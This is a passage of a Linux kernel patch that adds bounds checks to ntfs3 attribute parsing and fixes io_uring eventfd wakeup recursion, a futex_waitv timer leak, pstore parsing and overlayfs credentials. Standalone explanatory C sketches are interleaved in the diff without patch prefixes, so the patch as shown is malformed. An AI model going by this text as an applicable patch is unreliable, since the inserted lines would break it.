+  *
+@@ -1574,11 +1567,6 @@ nfsd4_cleanup_inter_ssc(struct vfsmount *ss_mnt, struct file *filp,
+ {
+ }
+ 
+-static void
+-nfsd4_interssc_disconnect(struct vfsmount *ss_mnt)
+-{
+-}
+-
+ static struct file *nfs42_ssc_open(struct vfsmount *ss_mnt,
+ 				   struct nfs_fh *src_fh,
+ 				   nfs4_stateid *stateid)
+@@ -1774,7 +1762,7 @@ static int nfsd4_do_async_copy(void *data)
+ 			default:
+ 				nfserr = nfserr_offload_denied;
+ 			}
+-			nfsd4_interssc_disconnect(copy->ss_mnt);
++			/* ss_mnt will be unmounted by the laundromat */
+ 			goto do_callback;
+ 		}
+ 		nfserr = nfsd4_do_copy(copy, filp, copy->nf_dst->nf_file,
+@@ -1855,8 +1843,10 @@ out_err:
+ 	if (async_copy)
+ 		cleanup_async_copy(async_copy);
+ 	status = nfserrno(-ENOMEM);
+-	if (nfsd4_ssc_is_inter(copy))
+-		nfsd4_interssc_disconnect(copy->ss_mnt);
++	/*
++	 * source's vfsmount of inter-copy will be unmounted
++	 * by the laundromat
++	 */
+ 	goto out;
+ }
+ 
+diff --git a/fs/ntfs3/attrib.c b/fs/ntfs3/attrib.c
+index 71f870d497aed..578c2bcfb1d93 100644
+--- a/fs/ntfs3/attrib.c
++++ b/fs/ntfs3/attrib.c
+@@ -101,6 +101,10 @@ static int attr_load_runs(struct ATTRIB *attr, struct ntfs_inode *ni,
+ 
+ 	asize = le32_to_cpu(attr->size);
+ 	run_off = le16_to_cpu(attr->nres.run_off);
++
++	if (run_off > asize)
++		return -EINVAL;
++
+ 	err = run_unpack_ex(run, ni->mi.sbi, ni->mi.rno, svcn, evcn,
+ 			    vcn ? *vcn : svcn, Add2Ptr(attr, run_off),
+ 			    asize - run_off);
+@@ -1217,6 +1221,11 @@ int attr_load_runs_vcn(struct ntfs_inode *ni, enum ATTR_TYPE type,
+ 	CLST svcn, evcn;
+ 	u16 ro;
+ 
++	if (!ni) {
++		/* Is record corrupted? */
++		return -ENOENT;
++	}
++
+ 	attr = ni_find_attr(ni, NULL, NULL, type, name, name_len, &vcn, NULL);
+ 	if (!attr) {
+ 		/* Is record corrupted? */
+@@ -1232,6 +1241,10 @@ int attr_load_runs_vcn(struct ntfs_inode *ni, enum ATTR_TYPE type,
+ 	}
+ 
+ 	ro = le16_to_cpu(attr->nres.run_off);
++
++	if (ro > le32_to_cpu(attr->size))
++		return -EINVAL;
++
+ 	err = run_unpack_ex(run, ni->mi.sbi, ni->mi.rno, svcn, evcn, svcn,
+ 			    Add2Ptr(attr, ro), le32_to_cpu(attr->size) - ro);
+ 	if (err < 0)
+@@ -1901,6 +1914,11 @@ int attr_collapse_range(struct ntfs_inode *ni, u64 vbo, u64 bytes)
+ 			u16 le_sz;
+ 			u16 roff = le16_to_cpu(attr->nres.run_off);
+ 
++			if (roff > le32_to_cpu(attr->size)) {
++				err = -EINVAL;
++				goto out;
++			}
++
+ 			run_unpack_ex(RUN_DEALLOCATE, sbi, ni->mi.rno, svcn,
+ 				      evcn1 - 1, svcn, Add2Ptr(attr, roff),
+ 				      le32_to_cpu(attr->size) - roff);
+diff --git a/fs/ntfs3/attrlist.c b/fs/ntfs3/attrlist.c
+index bad6d8a849a24..c0c6bcbc8c05c 100644
+--- a/fs/ntfs3/attrlist.c
++++ b/fs/ntfs3/attrlist.c
+@@ -68,6 +68,11 @@ int ntfs_load_attr_list(struct ntfs_inode *ni, struct ATTRIB *attr)
+ 
+ 		run_init(&ni->attr_list.run);
+ 
++		if (run_off > le32_to_cpu(attr->size)) {
++			err = -EINVAL;
++			goto out;
++		}
++
+ 		err = run_unpack_ex(&ni->attr_list.run, ni->mi.sbi, ni->mi.rno,
+ 				    0, le64_to_cpu(attr->nres.evcn), 0,
+ 				    Add2Ptr(attr, run_off),
+diff --git a/fs/ntfs3/bitmap.c b/fs/ntfs3/bitmap.c
+index 1930640be31a8..45f95c1cb2584 100644
+--- a/fs/ntfs3/bitmap.c
++++ b/fs/ntfs3/bitmap.c
+@@ -661,7 +661,7 @@ int wnd_init(struct wnd_bitmap *wnd, struct super_block *sb, size_t nbits)
+ 	if (!wnd->bits_last)
+ 		wnd->bits_last = wbits;
+ 
+-	wnd->free_bits = kcalloc(wnd->nwnd, sizeof(u16), GFP_NOFS);
++	wnd->free_bits = kcalloc(wnd->nwnd, sizeof(u16), GFP_NOFS | __GFP_NOWARN);
+ 	if (!wnd->free_bits)
+ 		return -ENOMEM;
+ 
+diff --git a/fs/ntfs3/frecord.c b/fs/ntfs3/frecord.c
+index 381a38a06ec22..b1b476fb7229b 100644
+--- a/fs/ntfs3/frecord.c
++++ b/fs/ntfs3/frecord.c
+@@ -568,6 +568,12 @@ static int ni_repack(struct ntfs_inode *ni)
+ 		}
+ 
+ 		roff = le16_to_cpu(attr->nres.run_off);
++
++		if (roff > le32_to_cpu(attr->size)) {
++			err = -EINVAL;
++			break;
++		}
++
+ 		err = run_unpack(&run, sbi, ni->mi.rno, svcn, evcn, svcn,
+ 				 Add2Ptr(attr, roff),
+ 				 le32_to_cpu(attr->size) - roff);
+@@ -1589,6 +1595,9 @@ int ni_delete_all(struct ntfs_inode *ni)
+ 		asize = le32_to_cpu(attr->size);
+ 		roff = le16_to_cpu(attr->nres.run_off);
+ 
++		if (roff > asize)
++			return -EINVAL;
++
+ 		/* run==1 means unpack and deallocate. */
+ 		run_unpack_ex(RUN_DEALLOCATE, sbi, ni->mi.rno, svcn, evcn, svcn,
+ 			      Add2Ptr(attr, roff), asize - roff);
+@@ -2291,6 +2300,11 @@ remove_wof:
+ 		asize = le32_to_cpu(attr->size);
+ 		roff = le16_to_cpu(attr->nres.run_off);
+ 
++		if (roff > asize) {
++			err = -EINVAL;
++			goto out;
++		}
++
+ 		/*run==1  Means unpack and deallocate. */
+ 		run_unpack_ex(RUN_DEALLOCATE, sbi, ni->mi.rno, svcn, evcn, svcn,
+ 			      Add2Ptr(attr, roff), asize - roff);
+diff --git a/fs/ntfs3/fslog.c b/fs/ntfs3/fslog.c
+index 0d611a6c5511f..c662d2a519072 100644
+--- a/fs/ntfs3/fslog.c
++++ b/fs/ntfs3/fslog.c
+@@ -1132,7 +1132,7 @@ static int read_log_page(struct ntfs_log *log, u32 vbo,
+ 		return -EINVAL;
+ 
+ 	if (!*buffer) {
+-		to_free = kmalloc(bytes, GFP_NOFS);
++		to_free = kmalloc(log->page_size, GFP_NOFS);
+ 		if (!to_free)
+ 			return -ENOMEM;
+ 		*buffer = to_free;
+@@ -1180,10 +1180,7 @@ static int log_read_rst(struct ntfs_log *log, u32 l_size, bool first,
+ 			struct restart_info *info)
+ {
+ 	u32 skip, vbo;
+-	struct RESTART_HDR *r_page = kmalloc(DefaultLogPageSize, GFP_NOFS);
+-
+-	if (!r_page)
+-		return -ENOMEM;
++	struct RESTART_HDR *r_page = NULL;
+ 
+ 	/* Determine which restart area we are looking for. */
+ 	if (first) {
+@@ -1197,7 +1194,6 @@ static int log_read_rst(struct ntfs_log *log, u32 l_size, bool first,
+ 	/* Loop continuously until we succeed. */
+ 	for (; vbo < l_size; vbo = 2 * vbo + skip, skip = 0) {
+ 		bool usa_error;
+-		u32 sys_page_size;
+ 		bool brst, bchk;
+ 		struct RESTART_AREA *ra;
+ 
+@@ -1251,24 +1247,6 @@ static int log_read_rst(struct ntfs_log *log, u32 l_size, bool first,
+ 			goto check_result;
+ 		}
+ 
+-		/* Read the entire restart area. */
+-		sys_page_size = le32_to_cpu(r_page->sys_page_size);
+-		if (DefaultLogPageSize != sys_page_size) {
+-			kfree(r_page);
+-			r_page = kzalloc(sys_page_size, GFP_NOFS);
+-			if (!r_page)
+-				return -ENOMEM;
+-
+-			if (read_log_page(log, vbo,
+-					  (struct RECORD_PAGE_HDR **)&r_page,
+-					  &usa_error)) {
+-				/* Ignore any errors. */
+-				kfree(r_page);
+-				r_page = NULL;
+-				continue;
+-			}
+-		}
+-
+ 		if (is_client_area_valid(r_page, usa_error)) {
+ 			info->valid_page = true;
+ 			ra = Add2Ptr(r_page, le16_to_cpu(r_page->ra_off));
+@@ -2727,6 +2705,9 @@ static inline bool check_attr(const struct MFT_REC *rec,
+ 			return false;
+ 		}
+ 
++		if (run_off > asize)
++			return false;
++
+ 		if (run_unpack(NULL, sbi, 0, svcn, evcn, svcn,
+ 			       Add2Ptr(attr, run_off), asize - run_off) < 0) {
+ 			return false;
+@@ -4771,6 +4752,12 @@ fake_attr:
+ 		u16 roff = le16_to_cpu(attr->nres.run_off);
+ 		CLST svcn = le64_to_cpu(attr->nres.svcn);
+ 
++		if (roff > t32) {
++			kfree(oa->attr);
++			oa->attr = NULL;
++			goto fake_attr;
++		}
++
+ 		err = run_unpack(&oa->run0, sbi, inode->i_ino, svcn,
+ 				 le64_to_cpu(attr->nres.evcn), svcn,
+ 				 Add2Ptr(attr, roff), t32 - roff);
+diff --git a/fs/ntfs3/fsntfs.c b/fs/ntfs3/fsntfs.c
+index 4ed15f64b17f6..b6e22bcb929ba 100644
+--- a/fs/ntfs3/fsntfs.c
++++ b/fs/ntfs3/fsntfs.c
+@@ -1849,9 +1849,10 @@ int ntfs_security_init(struct ntfs_sb_info *sbi)
+ 		goto out;
+ 	}
+ 
+-	root_sdh = resident_data(attr);
++	root_sdh = resident_data_ex(attr, sizeof(struct INDEX_ROOT));
+ 	if (root_sdh->type != ATTR_ZERO ||
+-	    root_sdh->rule != NTFS_COLLATION_TYPE_SECURITY_HASH) {
++	    root_sdh->rule != NTFS_COLLATION_TYPE_SECURITY_HASH ||
++	    offsetof(struct INDEX_ROOT, ihdr) + root_sdh->ihdr.used > attr->res.data_size) {
+ 		err = -EINVAL;
+ 		goto out;
+ 	}
+@@ -1867,9 +1868,10 @@ int ntfs_security_init(struct ntfs_sb_info *sbi)
+ 		goto out;
+ 	}
+ 
+-	root_sii = resident_data(attr);
++	root_sii = resident_data_ex(attr, sizeof(struct INDEX_ROOT));
+ 	if (root_sii->type != ATTR_ZERO ||
+-	    root_sii->rule != NTFS_COLLATION_TYPE_UINT) {
++	    root_sii->rule != NTFS_COLLATION_TYPE_UINT ||
++	    offsetof(struct INDEX_ROOT, ihdr) + root_sii->ihdr.used > attr->res.data_size) {
+ 		err = -EINVAL;
+ 		goto out;
+ 	}
+diff --git a/fs/ntfs3/index.c b/fs/ntfs3/index.c
+index 440328147e7e3..c27b4fe575136 100644
+--- a/fs/ntfs3/index.c
++++ b/fs/ntfs3/index.c
+@@ -1017,6 +1017,12 @@ ok:
+ 		err = 0;
+ 	}
+ 
++	/* check for index header length */
++	if (offsetof(struct INDEX_BUFFER, ihdr) + ib->ihdr.used > bytes) {
++		err = -EINVAL;
++		goto out;
++	}
++
+ 	in->index = ib;
+ 	*node = in;
+ 
+diff --git a/fs/ntfs3/inode.c b/fs/ntfs3/inode.c
+index d5a3afbbbfd8c..e352aa37330cd 100644
+--- a/fs/ntfs3/inode.c
++++ b/fs/ntfs3/inode.c
+@@ -129,6 +129,9 @@ next_attr:
+ 	rsize = attr->non_res ? 0 : le32_to_cpu(attr->res.data_size);
+ 	asize = le32_to_cpu(attr->size);
+ 
++	if (le16_to_cpu(attr->name_off) + attr->name_len > asize)
++		goto out;
++
+ 	switch (attr->type) {
+ 	case ATTR_STD:
+ 		if (attr->non_res ||
+@@ -364,7 +367,13 @@ next_attr:
+ attr_unpack_run:
+ 	roff = le16_to_cpu(attr->nres.run_off);
+ 
++	if (roff > asize) {
++		err = -EINVAL;
++		goto out;
++	}
++
+ 	t64 = le64_to_cpu(attr->nres.svcn);
++
+ 	err = run_unpack_ex(run, sbi, ino, t64, le64_to_cpu(attr->nres.evcn),
+ 			    t64, Add2Ptr(attr, roff), asize - roff);
+ 	if (err < 0)
+diff --git a/fs/ntfs3/record.c b/fs/ntfs3/record.c
+index 7d2fac5ee2156..af1e4b364ea8e 100644
+--- a/fs/ntfs3/record.c
++++ b/fs/ntfs3/record.c
+@@ -220,6 +220,11 @@ struct ATTRIB *mi_enum_attr(struct mft_inode *mi, struct ATTRIB *attr)
+ 			return NULL;
+ 		}
+ 
++		if (off + asize < off) {
++			/* overflow check */
++			return NULL;
++		}
++
+ 		attr = Add2Ptr(attr, asize);
+ 		off += asize;
+ 	}
+@@ -260,6 +265,11 @@ struct ATTRIB *mi_enum_attr(struct mft_inode *mi, struct ATTRIB *attr)
+ 		if (t16 + t32 > asize)
+ 			return NULL;
+ 
++		if (attr->name_len &&
++		    le16_to_cpu(attr->name_off) + sizeof(short) * attr->name_len > t16) {
++			return NULL;
++		}
++
+ 		return attr;
+ 	}
+ 
+diff --git a/fs/ntfs3/super.c b/fs/ntfs3/super.c
+index adc4f73722b7c..8e2fe0f69203b 100644
+--- a/fs/ntfs3/super.c
++++ b/fs/ntfs3/super.c
+@@ -789,7 +789,7 @@ static int ntfs_init_from_boot(struct super_block *sb, u32 sector_size,
+ 						 : (u32)boot->record_size
+ 							   << sbi->cluster_bits;
+ 
+-	if (record_size > MAXIMUM_BYTES_PER_MFT)
++	if (record_size > MAXIMUM_BYTES_PER_MFT || record_size < SECTOR_SIZE)
+ 		goto out;
+ 
+ 	sbi->record_bits = blksize_bits(record_size);
+@@ -1141,7 +1141,7 @@ static int ntfs_fill_super(struct super_block *sb, struct fs_context *fc)
+ 		goto put_inode_out;
+ 	}
+ 	bytes = inode->i_size;
+-	sbi->def_table = t = kmalloc(bytes, GFP_NOFS);
++	sbi->def_table = t = kmalloc(bytes, GFP_NOFS | __GFP_NOWARN);
+ 	if (!t) {
+ 		err = -ENOMEM;
+ 		goto put_inode_out;
+@@ -1260,9 +1260,9 @@ load_root:
+ 	ref.low = cpu_to_le32(MFT_REC_ROOT);
+ 	ref.seq = cpu_to_le16(MFT_REC_ROOT);
+ 	inode = ntfs_iget5(sb, &ref, &NAME_ROOT);
+-	if (IS_ERR(inode)) {
++	if (IS_ERR(inode) || !inode->i_op) {
+ 		ntfs_err(sb, "Failed to load root.");
+-		err = PTR_ERR(inode);
++		err = IS_ERR(inode) ? PTR_ERR(inode) : -EINVAL;
+ 		goto out;
+ 	}
+ 
+@@ -1281,6 +1281,7 @@ out:
+ 	 * Free resources here.
+ 	 * ntfs_fs_free will be called with fc->s_fs_info = NULL
+ 	 */
++	put_mount_options(sbi->options);
+ 	put_ntfs(sbi);
+ 	sb->s_fs_info = NULL;
+ 
+diff --git a/fs/overlayfs/dir.c b/fs/overlayfs/dir.c
+index 6b03457f72bb1..c3032cef391ef 100644
+--- a/fs/overlayfs/dir.c
++++ b/fs/overlayfs/dir.c
+@@ -592,28 +592,42 @@ static int ovl_create_or_link(struct dentry *dentry, struct inode *inode,
+ 			goto out_revert_creds;
+ 	}
+ 
+-	err = -ENOMEM;
+-	override_cred = prepare_creds();
+-	if (override_cred) {
++	if (!attr->hardlink) {
++		err = -ENOMEM;
++		override_cred = prepare_creds();
++		if (!override_cred)
++			goto out_revert_creds;
++		/*
++		 * In the creation cases(create, mkdir, mknod, symlink),
++		 * ovl should transfer current's fs{u,g}id to underlying
++		 * fs. Because underlying fs want to initialize its new
++		 * inode owner using current's fs{u,g}id. And in this
++		 * case, the @inode is a new inode that is initialized
++		 * in inode_init_owner() to current's fs{u,g}id. So use
++		 * the inode's i_{u,g}id to override the cred's fs{u,g}id.
++		 *
++		 * But in the other hardlink case, ovl_link() does not
++		 * create a new inode, so just use the ovl mounter's
++		 * fs{u,g}id.
++		 */
+ 		override_cred->fsuid = inode->i_uid;
+ 		override_cred->fsgid = inode->i_gid;
+-		if (!attr->hardlink) {
+-			err = security_dentry_create_files_as(dentry,
+-					attr->mode, &dentry->d_name, old_cred,
+-					override_cred);
+-			if (err) {
+-				put_cred(override_cred);
+-				goto out_revert_creds;
+-			}
++		err = security_dentry_create_files_as(dentry,
++				attr->mode, &dentry->d_name, old_cred,
++				override_cred);
++		if (err) {
++			put_cred(override_cred);
++			goto out_revert_creds;
+ 		}
+ 		put_cred(override_creds(override_cred));
+ 		put_cred(override_cred);
+-
+-		if (!ovl_dentry_is_whiteout(dentry))
+-			err = ovl_create_upper(dentry, inode, attr);
+-		else
+-			err = ovl_create_over_whiteout(dentry, inode, attr);
+ 	}
++
++	if (!ovl_dentry_is_whiteout(dentry))
++		err = ovl_create_upper(dentry, inode, attr);
++	else
++		err = ovl_create_over_whiteout(dentry, inode, attr);
++
+ out_revert_creds:
+ 	revert_creds(old_cred);
+ 	return err;
+diff --git a/fs/overlayfs/file.c b/fs/overlayfs/file.c
+index d066be3b9226e..6011f955436ba 100644
+--- a/fs/overlayfs/file.c
++++ b/fs/overlayfs/file.c
+@@ -96,6 +96,7 @@ static int ovl_change_flags(struct file *file, unsigned int flags)
+ 
+ 	spin_lock(&file->f_lock);
+ 	file->f_flags = (file->f_flags & ~OVL_SETFL_MASK) | flags;
++	file->f_iocb_flags = iocb_flags(file);
+ 	spin_unlock(&file->f_lock);
+ 
+ 	return 0;
+diff --git a/fs/pnode.c b/fs/pnode.c
+index 1106137c747a3..468e4e65a615d 100644
+--- a/fs/pnode.c
++++ b/fs/pnode.c
+@@ -244,7 +244,7 @@ static int propagate_one(struct mount *m)
+ 		}
+ 		do {
+ 			struct mount *parent = last_source->mnt_parent;
+-			if (last_source == first_source)
++			if (peers(last_source, first_source))
+ 				break;
+ 			done = parent->mnt_master == p;
+ 			if (done && peers(n, parent))
+diff --git a/fs/pstore/ram.c b/fs/pstore/ram.c
+index 74e4d93f3e08d..f3fa3625d772c 100644
+--- a/fs/pstore/ram.c
++++ b/fs/pstore/ram.c
+@@ -670,7 +670,7 @@ static int ramoops_parse_dt(struct platform_device *pdev,
+ 		field = value;						\
+ 	}
+ 
+-	parse_u32("mem-type", pdata->record_size, pdata->mem_type);
++	parse_u32("mem-type", pdata->mem_type, pdata->mem_type);
+ 	parse_u32("record-size", pdata->record_size, 0);
+ 	parse_u32("console-size", pdata->console_size, 0);
+ 	parse_u32("ftrace-size", pdata->ftrace_size, 0);
+diff --git a/fs/pstore/zone.c b/fs/pstore/zone.c
+index 017d0d4ad3295..2770746bb7aa1 100644
+--- a/fs/pstore/zone.c
++++ b/fs/pstore/zone.c
+@@ -761,7 +761,7 @@ static inline int notrace psz_kmsg_write_record(struct psz_context *cxt,
+ 		/* avoid destroying old data, allocate a new one */
+ 		len = zone->buffer_size + sizeof(*zone->buffer);
+ 		zone->oldbuf = zone->buffer;
+-		zone->buffer = kzalloc(len, GFP_KERNEL);
++		zone->buffer = kzalloc(len, GFP_ATOMIC);
+ 		if (!zone->buffer) {
+ 			zone->buffer = zone->oldbuf;
+ 			return -ENOMEM;
+diff --git a/include/linux/eventfd.h b/include/linux/eventfd.h
+index 3cd202d3eefb3..36a486505b081 100644
+--- a/include/linux/eventfd.h
++++ b/include/linux/eventfd.h
+@@ -40,6 +40,7 @@ struct file *eventfd_fget(int fd);
+ struct eventfd_ctx *eventfd_ctx_fdget(int fd);
+ struct eventfd_ctx *eventfd_ctx_fileget(struct file *file);
+ __u64 eventfd_signal(struct eventfd_ctx *ctx, __u64 n);
++__u64 eventfd_signal_mask(struct eventfd_ctx *ctx, __u64 n, unsigned mask);
+ int eventfd_ctx_remove_wait_queue(struct eventfd_ctx *ctx, wait_queue_entry_t *wait,
+ 				  __u64 *cnt);
+ void eventfd_ctx_do_read(struct eventfd_ctx *ctx, __u64 *cnt);
+@@ -66,6 +67,12 @@ static inline int eventfd_signal(struct eventfd_ctx *ctx, __u64 n)
+ 	return -ENOSYS;
+ }
+ 
++static inline int eventfd_signal_mask(struct eventfd_ctx *ctx, __u64 n,
++				      unsigned mask)
++{
++	return -ENOSYS;
++}
++
+ static inline void eventfd_ctx_put(struct eventfd_ctx *ctx)
+ {
+ 
+diff --git a/include/linux/nvme.h b/include/linux/nvme.h
+index 050d7d0cd81b0..d9fbc5afeaf72 100644
+--- a/include/linux/nvme.h
++++ b/include/linux/nvme.h
+@@ -7,6 +7,7 @@
+ #ifndef _LINUX_NVME_H
+ #define _LINUX_NVME_H
+ 
++#include <linux/bits.h>
+ #include <linux/types.h>
+ #include <linux/uuid.h>
+ 
+@@ -639,7 +640,7 @@ enum {
+ 	NVME_CMD_EFFECTS_NCC		= 1 << 2,
+ 	NVME_CMD_EFFECTS_NIC		= 1 << 3,
+ 	NVME_CMD_EFFECTS_CCC		= 1 << 4,
+-	NVME_CMD_EFFECTS_CSE_MASK	= 3 << 16,
++	NVME_CMD_EFFECTS_CSE_MASK	= GENMASK(18, 16),
+ 	NVME_CMD_EFFECTS_UUID_SEL	= 1 << 19,
+ };
+ 
+diff --git a/include/uapi/linux/eventpoll.h b/include/uapi/linux/eventpoll.h
+index 8a3432d0f0dcb..e687658843b1c 100644
+--- a/include/uapi/linux/eventpoll.h
++++ b/include/uapi/linux/eventpoll.h
+@@ -41,6 +41,12 @@
+ #define EPOLLMSG	(__force __poll_t)0x00000400
+ #define EPOLLRDHUP	(__force __poll_t)0x00002000
+ 
++/*
++ * Internal flag - wakeup generated by io_uring, used to detect recursion back
++ * into the io_uring poll handler.
++ */
++#define EPOLL_URING_WAKE	((__force __poll_t)(1U << 27))
++
+ /* Set exclusive wakeup mode for the target file descriptor */
+ #define EPOLLEXCLUSIVE	((__force __poll_t)(1U << 28))
+ 
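
Illustration of the new private flag (the flag values are copied from this header; the plain typedef standing in for __poll_t is an assumption of the sketch): bit 27 was unused, so a wakeup key can carry the io_uring marker alongside EPOLLIN without colliding with existing flags such as EPOLLEXCLUSIVE:

    #include <stdio.h>

    typedef unsigned int poll_t;            /* stand-in for __poll_t */

    #define EPOLLIN          ((poll_t)0x00000001)
    #define EPOLL_URING_WAKE ((poll_t)(1U << 27))
    #define EPOLLEXCLUSIVE   ((poll_t)(1U << 28))

    int main(void)
    {
        poll_t key = EPOLLIN | EPOLL_URING_WAKE;

        /* The marked wakeup is still readable, still not exclusive. */
        printf("in=%d uring=%d excl=%d\n",
               !!(key & EPOLLIN), !!(key & EPOLL_URING_WAKE),
               !!(key & EPOLLEXCLUSIVE));
        return 0;
    }
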
+diff --git a/io_uring/io_uring.c b/io_uring/io_uring.c
+index 17771cb3c3330..71f1cabb9f3d4 100644
+--- a/io_uring/io_uring.c
++++ b/io_uring/io_uring.c
+@@ -495,7 +495,7 @@ static void io_eventfd_ops(struct rcu_head *rcu)
+ 	int ops = atomic_xchg(&ev_fd->ops, 0);
+ 
+ 	if (ops & BIT(IO_EVENTFD_OP_SIGNAL_BIT))
+-		eventfd_signal(ev_fd->cq_ev_fd, 1);
++		eventfd_signal_mask(ev_fd->cq_ev_fd, 1, EPOLL_URING_WAKE);
+ 
+ 	/* IO_EVENTFD_OP_FREE_BIT may not be set here depending on callback
+ 	 * ordering in a race but if references are 0 we know we have to free
+@@ -531,7 +531,7 @@ static void io_eventfd_signal(struct io_ring_ctx *ctx)
+ 		goto out;
+ 
+ 	if (likely(eventfd_signal_allowed())) {
+-		eventfd_signal(ev_fd->cq_ev_fd, 1);
++		eventfd_signal_mask(ev_fd->cq_ev_fd, 1, EPOLL_URING_WAKE);
+ 	} else {
+ 		atomic_inc(&ev_fd->refs);
+ 		if (!atomic_fetch_or(BIT(IO_EVENTFD_OP_SIGNAL_BIT), &ev_fd->ops))
+diff --git a/io_uring/io_uring.h b/io_uring/io_uring.h
+index 50bc3af449534..4334cd30c423d 100644
+--- a/io_uring/io_uring.h
++++ b/io_uring/io_uring.h
+@@ -4,6 +4,7 @@
+ #include <linux/errno.h>
+ #include <linux/lockdep.h>
+ #include <linux/io_uring_types.h>
++#include <uapi/linux/eventpoll.h>
+ #include "io-wq.h"
+ #include "slist.h"
+ #include "filetable.h"
+@@ -207,12 +208,18 @@ static inline void io_commit_cqring(struct io_ring_ctx *ctx)
+ static inline void __io_cqring_wake(struct io_ring_ctx *ctx)
+ {
+ 	/*
+-	 * wake_up_all() may seem excessive, but io_wake_function() and
+-	 * io_should_wake() handle the termination of the loop and only
+-	 * wake as many waiters as we need to.
++	 * Trigger waitqueue handler on all waiters on our waitqueue. This
++	 * won't necessarily wake up all the tasks, io_should_wake() will make
++	 * that decision.
++	 *
++	 * Pass in EPOLLIN|EPOLL_URING_WAKE as the poll wakeup key. The latter
++	 * set in the mask so that if we recurse back into our own poll
++	 * waitqueue handlers, we know we have a dependency between eventfd or
++	 * epoll and should terminate multishot poll at that point.
+ 	 */
+ 	if (waitqueue_active(&ctx->cq_wait))
+-		wake_up_all(&ctx->cq_wait);
++		__wake_up(&ctx->cq_wait, TASK_NORMAL, 0,
++				poll_to_key(EPOLL_URING_WAKE | EPOLLIN));
+ }
+ 
+ static inline void io_cqring_wake(struct io_ring_ctx *ctx)
+diff --git a/io_uring/poll.c b/io_uring/poll.c
+index d9bf1767867e6..fded1445a803b 100644
+--- a/io_uring/poll.c
++++ b/io_uring/poll.c
+@@ -429,6 +429,14 @@ static int io_poll_wake(struct wait_queue_entry *wait, unsigned mode, int sync,
+ 		return 0;
+ 
+ 	if (io_poll_get_ownership(req)) {
++		/*
++		 * If we trigger a multishot poll off our own wakeup path,
++		 * disable multishot as there is a circular dependency between
++		 * CQ posting and triggering the event.
++		 */
++		if (mask & EPOLL_URING_WAKE)
++			poll->events |= EPOLLONESHOT;
++
+ 		/* optional, saves extra locking for removal in tw handler */
+ 		if (mask && poll->events & EPOLLONESHOT) {
+ 			list_del_init(&poll->wait.entry);
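
A reduced model of the recursion guard added above (hypothetical types; only the flag test is taken from the hunk): when the wakeup key carries EPOLL_URING_WAKE, the request downgrades itself to one-shot, so a multishot poll cannot keep re-arming off io_uring's own CQ postings:

    #include <stdio.h>

    #define EPOLLIN          0x001u
    #define EPOLL_URING_WAKE (1u << 27)
    #define EPOLLONESHOT     (1u << 30)

    struct poll_req { unsigned int events; };

    static void poll_wake(struct poll_req *req, unsigned int mask)
    {
        if (mask & EPOLL_URING_WAKE)    /* wakeup came from io_uring itself */
            req->events |= EPOLLONESHOT;
    }

    int main(void)
    {
        struct poll_req req = { .events = EPOLLIN };

        poll_wake(&req, EPOLLIN | EPOLL_URING_WAKE);
        printf("oneshot after self-wake: %d\n",
               !!(req.events & EPOLLONESHOT));
        return 0;
    }
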
+diff --git a/kernel/futex/syscalls.c b/kernel/futex/syscalls.c
+index 086a22d1adb78..a8074079b09e8 100644
+--- a/kernel/futex/syscalls.c
++++ b/kernel/futex/syscalls.c
+@@ -286,19 +286,22 @@ SYSCALL_DEFINE5(futex_waitv, struct futex_waitv __user *, waiters,
+ 	}
+ 
+ 	futexv = kcalloc(nr_futexes, sizeof(*futexv), GFP_KERNEL);
+-	if (!futexv)
+-		return -ENOMEM;
++	if (!futexv) {
++		ret = -ENOMEM;
++		goto destroy_timer;
++	}
+ 
+ 	ret = futex_parse_waitv(futexv, waiters, nr_futexes);
+ 	if (!ret)
+ 		ret = futex_wait_multiple(futexv, nr_futexes, timeout ? &to : NULL);
+ 
++	kfree(futexv);
++
++destroy_timer:
+ 	if (timeout) {
+ 		hrtimer_cancel(&to.timer);
+ 		destroy_hrtimer_on_stack(&to.timer);
+ 	}
+-
+-	kfree(futexv);
+ 	return ret;
+ }
+ 
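
The futex_waitv() hunk is an unwind-ordering fix: the hrtimer is armed before the kcalloc(), so a failed allocation must still reach the timer teardown. A generic, self-contained sketch of the goto-unwind pattern (resource names are hypothetical, not the kernel's):

    #include <stdio.h>
    #include <stdlib.h>

    static void arm_timer(void)     { puts("timer armed"); }
    static void destroy_timer(void) { puts("timer destroyed"); }

    static int waitv(size_t n)
    {
        int *vec;
        int ret = 0;

        arm_timer();                    /* set up before the allocation */

        vec = calloc(n, sizeof(*vec));
        if (!vec) {
            ret = -1;
            goto out_destroy;           /* the old code returned here,
                                         * leaking the armed timer */
        }

        /* ... wait on the futexes ... */
        free(vec);
    out_destroy:
        destroy_timer();
        return ret;
    }

    int main(void) { return waitv(4) ? 1 : 0; }
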
+diff --git a/kernel/kcsan/core.c b/kernel/kcsan/core.c
+index fe12dfe254ecf..54d077e1a2dc7 100644
+--- a/kernel/kcsan/core.c
++++ b/kernel/kcsan/core.c
+@@ -14,10 +14,12 @@
+ #include <linux/init.h>
+ #include <linux/kernel.h>
+ #include <linux/list.h>
++#include <linux/minmax.h>
+ #include <linux/moduleparam.h>
+ #include <linux/percpu.h>
+ #include <linux/preempt.h>
+ #include <linux/sched.h>
++#include <linux/string.h>
+ #include <linux/uaccess.h>
+ 
+ #include "encoding.h"
+@@ -1308,3 +1310,51 @@ noinline void __tsan_atomic_signal_fence(int memorder)
+ 	}
+ }
+ EXPORT_SYMBOL(__tsan_atomic_signal_fence);
++
++#ifdef __HAVE_ARCH_MEMSET
++void *__tsan_memset(void *s, int c, size_t count);
++noinline void *__tsan_memset(void *s, int c, size_t count)
++{
++	/*
++	 * Instead of not setting up watchpoints where accessed size is greater
++	 * than MAX_ENCODABLE_SIZE, truncate checked size to MAX_ENCODABLE_SIZE.
++	 */
++	size_t check_len = min_t(size_t, count, MAX_ENCODABLE_SIZE);
++
++	check_access(s, check_len, KCSAN_ACCESS_WRITE, _RET_IP_);
++	return memset(s, c, count);
++}
++#else
++void *__tsan_memset(void *s, int c, size_t count) __alias(memset);
++#endif
++EXPORT_SYMBOL(__tsan_memset);
++
++#ifdef __HAVE_ARCH_MEMMOVE
++void *__tsan_memmove(void *dst, const void *src, size_t len);
++noinline void *__tsan_memmove(void *dst, const void *src, size_t len)
++{
++	size_t check_len = min_t(size_t, len, MAX_ENCODABLE_SIZE);
++
++	check_access(dst, check_len, KCSAN_ACCESS_WRITE, _RET_IP_);
++	check_access(src, check_len, 0, _RET_IP_);
++	return memmove(dst, src, len);
++}
++#else
++void *__tsan_memmove(void *dst, const void *src, size_t len) __alias(memmove);
++#endif
++EXPORT_SYMBOL(__tsan_memmove);
++
